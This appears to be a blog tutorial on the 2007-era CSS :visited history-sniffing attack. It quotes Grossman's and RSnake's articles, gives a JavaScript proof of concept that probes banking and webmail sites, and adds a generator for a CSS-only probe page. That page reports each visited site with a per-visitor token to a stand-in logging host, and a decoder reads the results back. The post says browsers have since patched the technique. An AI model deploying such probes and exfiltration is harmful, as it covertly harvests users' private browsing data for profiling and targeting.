Stealing the user's browsing history

At first glance this looks impossible, but it is not.

Let's look at how it is done.

First, the article that started it all (Jeremiah Grossman's). It is probably blocked here, so the original text is copied below:


I know where you've been
Update 2: CSS History Hack Demonstration code available. Thank you to RSnake for hosting.


Update: Removed the JS PoC from the template and pasted it below. Was messing up IE.


I updated the blog template to display some proof-of-concept browser history stealing JavaScript code. On the right side column notice the "I know where you've been" heading. Below that, if you're using Firefox, Mozilla, Netscape or Safari, you should see a bunch of links to websites you've been to. Don't worry, I'm not capturing this data, only you can see it, though it does prove a point. This trick probably works in Internet Explorer, though I haven't tried to port the code to find out for sure. I wonder how long until the marketers start using this for additional visitor profiling. Feel free to view-source and find the trick.

The article describes a very simple idea: the browser automatically renders links to sites the user has already visited in a different style (the :visited pseudo-class). A script on the page can therefore create a link to a candidate URL, read its computed style, and learn whether that URL is in the history. Note that this cannot enumerate the history; it can only confirm or deny URLs from a list of sites we are interested in, checked one by one.


The code is as follows:

var agent = navigator.userAgent.toLowerCase();
// Almost every browser (IE included) puts "mozilla" in its UA string, so this
// check is effectively always true; it is kept as in the original PoC.
var is_mozilla = (agent.indexOf("mozilla") != -1);


// popular websites. Lookup if user has visited any.
var websites = [
  "http://ajaxian.com/",
  "http://digg.com/",
  "http://english.aljazeera.net/HomePage",
  "http://ha.ckers.org",
  "http://ha.ckers.org/blog/",
  "http://jeremiahgrossman.blogspot.com/",
  "http://login.yahoo.com/",
  "http://mail.google.com/",
  "http://mail.yahoo.com/",
  "http://my.yahoo.com/",
  "http://reddit.com/",
  "http://seoblackhat.com",
  "http://slashdot.org/",
  "http://techfoolery.com/",
  "http://weblogs.asp.net/jezell/",
  "http://www.amazon.com/",
  "http://www.aol.com/",
  "http://www.bankofamerica.com/",
  "http://www.bankone.com/",
  "http://www.blackhat.com/",
  "http://www.blogger.com/",
  "http://www.bloglines.com/",
  "http://www.bofa.com/",
  "http://www.capitalone.com/",
  "http://www.cenzic.com",
  "http://www.cgisecurity.com",
  "http://www.chase.com/",
  "http://www.citibank.com/",
  "http://www.cnn.com/",
  "http://www.comerica.com/",
  "http://www.e-gold.com/",
  "http://www.ebay.com/",
  "http://www.etrade.com/",
  "http://www.expedia.com/",
  "http://www.google.com/",
  "http://www.hsbc.com/",
  "http://www.icq.com/",
  "http://www.jailbabes.com",
  "http://www.microsoft.com/",
  "http://www.msn.com/",
  "http://www.myspace.com/",
  "http://www.ntobjectives.com",
  "http://www.passport.net/",
  "http://www.paypal.com/",
  "http://www.sourceforge.net/",
  "http://www.spidynamics.com",
  "http://www.statefarm.com/",
  "http://www.usbank.com/",
  "http://www.wachovia.com/",
  "http://www.wamu.com/",
  "http://www.watchfire.com",
  "http://www.webappsec.org",
  "http://www.wellsfargo.com/",
  "http://www.whitehatsec.com",
  "http://www.xanga.com/",
  "http://www.yahoo.com/",
  "http://seoblackhat.com/",
  "http://www.alexa.com/",
  "http://www.youtube.com/",
  "https://banking.wellsfargo.com/",
  "https://commerce.blackhat.com/",
  "https://online.wellsfargo.com/",
];


/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {


  var flag = document.createElement('div');
  flag.id = 'xss_flag';
  document.body.appendChild(flag);


  // table that receives the list of visited sites
  var table = document.createElement('table');
  table.border = 0;
  table.cellPadding = 5;
  table.cellSpacing = 10;
  table.width = '90%';
  table.align = 'center';
  table.id = 'data';
  document.body.appendChild(table);


  // The original also wrote a heading with document.write(); that markup was
  // lost when the page was copied, so results are written into the table below.


  /* launch steal history */
  if (is_mozilla) {
    stealHistory();
  }


}


function stealHistory() {

  var table = document.getElementById('data');

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {
    var link = document.createElement("a");
    link.id = "id" + i;
    link.href = websites[i];
    link.innerHTML = websites[i];
    document.body.appendChild(link);
    // The page's stylesheet must give visited links a distinctive colour. This
    // PoC assumes a rule such as  a:visited { color: #0000FF }  so that a
    // computed colour of rgb(0, 0, 255) means "visited"; adjust the comparison
    // to whatever :visited colour the hosting page defines.
    var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
    document.body.removeChild(link);

    // check for visited
    if (color == "rgb(0, 0, 255)") {
      var row = table.insertRow(-1);
      row.insertCell(0).appendChild(document.createTextNode(websites[i]));
    } // end visited check

  } // end visited website loop


} // end stealHistory method


Using JavaScript has its drawbacks, though. If the user has disabled JavaScript, this approach simply fails. Also, for real user tracking the result must be sent back to a server; that is easy enough with a bit of Ajax (or an image request that carries the visited URL as a query parameter).

So there is an improvement on it; see RSnake's follow-up article. Again, the original text is placed below in case it gets blocked.

The article below covers all the related material, and at the end it links an example site with usable source code, so I won't add much. One caveat a practitioner should know: browser vendors closed both variants around 2010 and 2011 (Firefox 4, then Chrome, Safari and IE). getComputedStyle now reports the unvisited style, and :visited may only change colour properties, not display or background-image, so neither proof of concept fires in a current browser.

Well, the server is back up and running (big thanks to id - during our upgrade there was a drive failure causing us to have to switch machines), and to celebrate I didn't want to come back with a boring post that would make you question why you read this site. So instead I decided to play around with some CSS tricks - bear with me for a minute. I don't know why, but I really think CSS is going to get worse over time. Anyway, as I was poking around I happened across one of the missing pieces of the puzzle to solve a simple problem in using CSS to hack - the lack of conditional logic.

Jeremiah and I spent at least an hour on the phone several months back when he was coming up with browser port scanning without JavaScript. One of the key problems with that technique, which he later overcame, was that he was unable to find any good way to do conditional logic in CSS, so instead he leaned on a browser quirk that delays the rendering of images. Watching the timing differences can help an attacker derive which ports are open and which aren’t. While very cool, it’s caused some headaches and only solved one of our problems.

Before that Jeremiah also came up with the original CSS history hack as you may or may not remember. Later on pdp came up with another variant of the same issue using a very different technique (Firefox caching). Both of those techniques were cool, but both of them also required that you have JavaScript turned on. We all know there are still people out there who think turning off JavaScript protects them from everything.

Keeping this in mind it would be great if you could create a form of conditional logic in CSS. Well I finally figured out a way. Using a hybrid of a:visited and display: attribute you can detect that the user has visited a page and more importantly perform an action based on that fact. The actions are somewhat limited if you can’t use JavaScript, however, one action is enough. The reason being, when something is set to display:none it will actually cause the HTML tag that it references to not render. Setting the background: image attribute for the visible tag to use a URL of a logging CGI script allows you to send a request to a remote webserver based on the conditional logic as mentioned above.

Now, the only lacking part is the state management, and that can easily be tied together using a unique cookie, and/or an IP address in the QUERY_STRING or anything else you want to use to identify the user. In this way, the remote website can steal history information from the user without ever once using JavaScript, or any client side programming. Click here for a proof of concept of the CSS history theft without using JavaScript. This works nearly instantly, so it is far better than the JavaScript-less intranet hacking and pdp’s version of the JavaScript CSS history hack in terms of speed. The only latency is the time it takes your browser to request the images associated with each URL you’ve visited - which is nearly instant since I don’t return any data (and thanks to browser threading). The other nice thing about this is that it works beautifully in both Internet Explorer 7.0 and Firefox 2.0.0.2 (although it doesn’t work in Opera 9.22).

I haven’t experimented much with this yet, but I also believe this could be expanded to do another form of intranet port scanning as well. Using a series of iframes and forced browsing it may be possible to detect which pages the user can access. I’m not in love with this technique because the CSS will fire too quickly so you’d have to delay the CSS from loading or make it reload with a meta refresh or something equivalent, but I also haven’t put much thought into it yet.

The ramifications of the CSS history hacking stuff are that it allows the attacker to steal information about the client, which can be useful to identify a target, to find information about the user, for use in targeted attacks, to know trending information for use in targeted advertisements or other forms of private information theft.

So now we’ve eliminated the JavaScript pre-requisite from Intranet port scanning, cross site request forgeries, session riding and of course CSS history hacking. The only thing we can’t yet do without JavaScript is read cross domain (and I stress the word yet). What else is left? I don’t mean to sound ho-hum about this, but really, what else do we have to do? Are there any nay-sayers left?
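The CSS-only variant described above (a:visited toggling display, and a background image on the visible element that requests a logging URL carrying a per-visitor token) can be made concrete with a small generator for the probe page and the matching server-side decoder. This is an added example, not RSnake's proof-of-concept or code from either quoted article; the logging endpoint https://logger.example/log, the token format, the combined-log regex and the log lines are all assumptions constructed for the demo.

```javascript
// Added example: generator for a CSS-only history probe page in the style
// described above, plus the server-side decoder that maps logger hits back
// to visited URLs. Assumed (not from the page): the logging endpoint, the
// per-visitor token, and the constructed log lines below.

const LOG_ENDPOINT = "https://logger.example/log"; // assumed endpoint

// Escape a URL for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Build the probe page: one anchor per candidate URL, hidden by default.
// Only the :visited rule makes the anchor render, and only then does the
// background image URL (token + candidate index) get requested from the
// logger. No script runs on the page; the "conditional" is the pseudo-class.
function buildHistoryProbePage(urls, token, logEndpoint = LOG_ENDPOINT) {
  const css = ["a.probe { display: none; }"];
  const anchors = [];
  urls.forEach((url, i) => {
    const hit = `${logEndpoint}?t=${encodeURIComponent(token)}&i=${i}`;
    css.push(`#h${i}:visited { display: inline; background: url("${hit}"); }`);
    anchors.push(`<a id="h${i}" class="probe" href="${escapeAttr(url)}">${escapeAttr(url)}</a>`);
  });
  return `<!DOCTYPE html>\n<html><head><style>\n${css.join("\n")}\n</style></head>\n` +
         `<body>\n${anchors.join("\n")}\n</body></html>\n`;
}

// Parse one combined-format access log line into {ip, path, status};
// returns null for lines that do not match. The regex is the demo's assumption.
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP\/[\d.]+" (\d{3})/;
function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  return m ? { ip: m[1], path: m[2], status: Number(m[3]) } : null;
}

// Server side: for one visitor token, turn logger hits back into the list of
// visited candidate URLs. Hits with another token, an unknown path or an
// out-of-range index are ignored; result keeps candidate order.
function decodeVisited(logLines, urls, token) {
  const endpointPath = new URL(LOG_ENDPOINT).pathname;
  const visited = new Set();
  for (const line of logLines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const u = new URL(req.path, "http://placeholder");
    if (u.pathname !== endpointPath) continue;
    if (u.searchParams.get("t") !== token) continue;
    const i = Number(u.searchParams.get("i"));
    if (Number.isInteger(i) && i >= 0 && i < urls.length) visited.add(urls[i]);
  }
  return urls.filter((x) => visited.has(x));
}

// Constructed demo data: three candidate URLs, one visitor token, and five
// log lines (two real hits, one from another token, one bad index, one noise).
const CANDIDATES = ["http://www.paypal.com/", "http://www.ebay.com/", "https://online.wellsfargo.com/"];
const DEMO_TOKEN = "deadbeefcafef00d";
const DEMO_LOG = [
  '203.0.113.5 - - [10/Oct/2007:13:55:36 +0000] "GET /log?t=deadbeefcafef00d&i=0 HTTP/1.1" 204 0',
  '203.0.113.5 - - [10/Oct/2007:13:55:36 +0000] "GET /log?t=deadbeefcafef00d&i=2 HTTP/1.1" 204 0',
  '198.51.100.7 - - [10/Oct/2007:13:55:40 +0000] "GET /log?t=0000000000000000&i=1 HTTP/1.1" 204 0',
  '203.0.113.5 - - [10/Oct/2007:13:55:41 +0000] "GET /log?t=deadbeefcafef00d&i=99 HTTP/1.1" 204 0',
  '203.0.113.5 - - [10/Oct/2007:13:55:42 +0000] "GET /favicon.ico HTTP/1.1" 404 0',
];

console.log(buildHistoryProbePage(CANDIDATES, DEMO_TOKEN));
console.log(decodeVisited(DEMO_LOG, CANDIDATES, DEMO_TOKEN));
```

The token should be generated per visitor (a random value, also set as a cookie if you want to tie it to later requests); the index in the query string is what identifies which candidate was visited. The page this generates only produces log hits in a 2007-era browser: current browsers ignore display and background on :visited, so running it today demonstrates the mechanism and the fix at the same time.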
